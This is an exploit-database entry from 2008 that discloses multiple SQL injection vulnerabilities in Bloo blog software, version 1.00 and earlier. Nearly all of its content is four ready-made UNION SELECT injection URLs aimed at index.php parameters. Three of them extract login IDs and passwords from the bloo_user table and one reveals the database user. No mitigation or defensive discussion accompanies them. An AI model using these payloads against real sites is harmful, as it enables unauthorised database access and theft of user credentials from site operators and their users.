[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities
# Published : 2008-03-11
# Author : MhZ91
# Previous Title : Mapbender 2.4.4 (gaz) Remote SQL Injection Vulnerability
# Next Title : phpBB Mod FileBase (id) Remote SQL Injection Vulnerability
--==+================================================================================+==--
--==+ Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection +==--
--==+================================================================================+==--
Author: MhZ91
Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=160870
Bug: Remote Sql Injection
Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection...
http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
etc...
etc...
etc...
I think there are other sql injection in this blog lol
[*]----------------------------------------------------------
# www.Syue.com [2008-03-11]